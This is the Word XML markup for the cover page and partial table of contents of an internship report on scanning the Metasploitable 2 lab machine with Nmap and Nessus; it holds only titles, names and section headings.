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107" w:rsidRPr="001F569E" w:rsidRDefault="00173879" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SENSELEARNER</w:t>
      </w:r>
      <w:r w:rsidR="00A343A3" w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B4107" w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">TECHNOLOGIES </w:t>
      </w:r>
      <w:r w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B4107" w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PVT</w:t>
      </w:r>
      <w:r w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002B4107" w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LTD (DEHRADUN)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="001F569E" w:rsidRDefault="002B4107" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F569E">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">UTTARAKHND </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D60F50" w:rsidRDefault="00D60F50" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="800000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="001F569E" w:rsidRDefault="004A2C12" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A727F9">
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="001F569E" w:rsidRPr="00A727F9">
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Security </w:t>
      </w:r>
      <w:r w:rsidR="001F569E" w:rsidRPr="001F569E">
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Analysis of Metasploitable 2 using Nmap and Nessus</w:t>
      </w:r>
      <w:r w:rsidRPr="001F569E">
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:b/>
          <w:color w:val="4472C4" w:themeColor="accent5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="001F569E" w:rsidRDefault="00B16922" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian"/>
          <w:color w:val="333399"/>
          <w:sz w:val="30"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="00D00724" w:rsidRDefault="001967AA" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00724">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Synopsis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173879" w:rsidRDefault="00173879" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="00D00724" w:rsidRDefault="00B16922" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00724">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Submitted in Partial fulfillment for the award of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173879" w:rsidRDefault="00173879" w:rsidP="00031D8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="00D00724" w:rsidRDefault="00031D8B" w:rsidP="00031D8B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00724">
        <w:rPr>
          <w:color w:val="ED7D31" w:themeColor="accent2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>INTERN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRDefault="00A343A3" w:rsidP="00B16922">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1798320" cy="1798320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1" name="Picture 1" descr="senselearn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elearner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a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751F50" w:rsidRPr="00751F50" w:rsidRDefault="00751F50" w:rsidP="00173879">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00751F50" w:rsidRPr="00D00724" w:rsidRDefault="00751F50" w:rsidP="00751F50">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Submitted By</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751F50" w:rsidRPr="00D00724" w:rsidRDefault="00173879" w:rsidP="00751F50">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D00724">
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:hAnsi="Arial Black"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Name SHREYA SHREE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00173879" w:rsidRDefault="00173879" w:rsidP="00173879">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751F50" w:rsidRDefault="00173879" w:rsidP="00173879">
      <w:pPr>
        <w:rPr>
          <w:color w:val="333399"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333399"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                   </w:t>
      </w:r>
      <w:r w:rsidR="00B16922" w:rsidRPr="00751F50">
        <w:rPr>
          <w:color w:val="333399"/>
        </w:rPr>
        <w:t>Under the Guidance of</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2C12" w:rsidRDefault="00D43A18" w:rsidP="00751F50">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mr</w:t>
      </w:r>
      <w:r w:rsidR="004A2C12">
        <w:rPr>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00964EF2">
        <w:rPr>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0002005E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Shaurabh </w:t>
      </w:r>
      <w:r w:rsidR="00964EF2">
        <w:rPr>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0002005E">
        <w:rPr>
          <w:b/>
          <w:color w:val="000080"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">kashyap </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="000B66D1" w:rsidRDefault="00173879" w:rsidP="00173879">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserve">                                            </w:t>
      </w:r>
      <w:r w:rsidR="004A2C12">
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>Designation</w:t>
      </w:r>
      <w:r w:rsidR="00B16922">
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00751F50">
        <w:rPr>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B16922" w:rsidRPr="004A3280">
        <w:rPr>
          <w:color w:val="333399"/>
        </w:rPr>
        <w:t>Dep</w:t>
      </w:r>
      <w:r w:rsidR="00751F50">
        <w:rPr>
          <w:color w:val="333399"/>
        </w:rPr>
        <w:t xml:space="preserve">artment </w:t>
      </w:r>
      <w:r w:rsidR="00B16922" w:rsidRPr="004A3280">
        <w:rPr>
          <w:color w:val="333399"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="333399"/>
        </w:rPr>
        <w:t>INTERN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRDefault="00B16922" w:rsidP="00B16922"/>
    <w:p w:rsidR="00B16922" w:rsidRDefault="00A343A3" w:rsidP="004B60B4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2225040" cy="876300"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="SENSELEA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ELEAR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5040" cy="876300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRDefault="00B16922" w:rsidP="00B16922"/>
    <w:p w:rsidR="00B16922" w:rsidRDefault="004B60B4" w:rsidP="004B60B4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                                                         </w:t>
      </w:r>
      <w:r w:rsidR="002431E8">
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>JUN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>E-JULY</w:t>
      </w:r>
      <w:r w:rsidR="00BD3A56">
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2023</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004A2C12" w:rsidRDefault="004A2C12" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A2C12" w:rsidRDefault="004A2C12" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A2C12" w:rsidRDefault="004A2C12" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004A2C12" w:rsidRDefault="004A2C12" w:rsidP="00B16922">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="333399"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A727F9" w:rsidRDefault="00A727F9" w:rsidP="00B16922">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="00AE6ED5" w:rsidRDefault="00B16922" w:rsidP="00B16922">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AE6ED5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ABSTRACT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B16922" w:rsidRPr="00032459" w:rsidRDefault="00B16922" w:rsidP="00B16922">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00942CC1" w:rsidRDefault="00942CC1" w:rsidP="004A77BF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7740"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00942CC1" w:rsidRDefault="00942CC1" w:rsidP="00B923CE">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00942CC1" w:rsidRPr="008C4012" w:rsidRDefault="00942CC1" w:rsidP="00942CC1">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent5"/>
        <w:tblW w:w="8557" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="05C0" w:firstRow="0" w:lastRow="1" w:firstColumn="1" w:lastColumn="1" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1589"/>
        <w:gridCol w:w="6968"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E8305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589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00AF5967" w:rsidRDefault="00E83055" w:rsidP="00942CC1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">     </w:t>
            </w:r>
            <w:r w:rsidRPr="00AF5967">
              <w:t>S.No.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00AF5967" w:rsidRDefault="00E83055" w:rsidP="00A11325">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF5967">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>TOPIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">
        <w:trPr>
          <w:trHeight w:val="354"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="0096295F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="001F569E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Setup and Installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">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589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="0096295F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="00942CC1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Network Scanning using Nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">
        <w:trPr>
          <w:trHeight w:val="365"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="0096295F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="00942CC1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>Vulnerability Assessment using Nessus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E83055" w:rsidRPr="008C4012" w:rsidTr="00E83055">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589" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E83055" w:rsidRPr="00A11325" w:rsidRDefault="00E83055" w:rsidP="00C54AED">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A11325">
              <w:rPr>
                <w:b w:val="0"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="000100000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="1" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="6968" w:type="dxa"/>
          </w:tcPr>
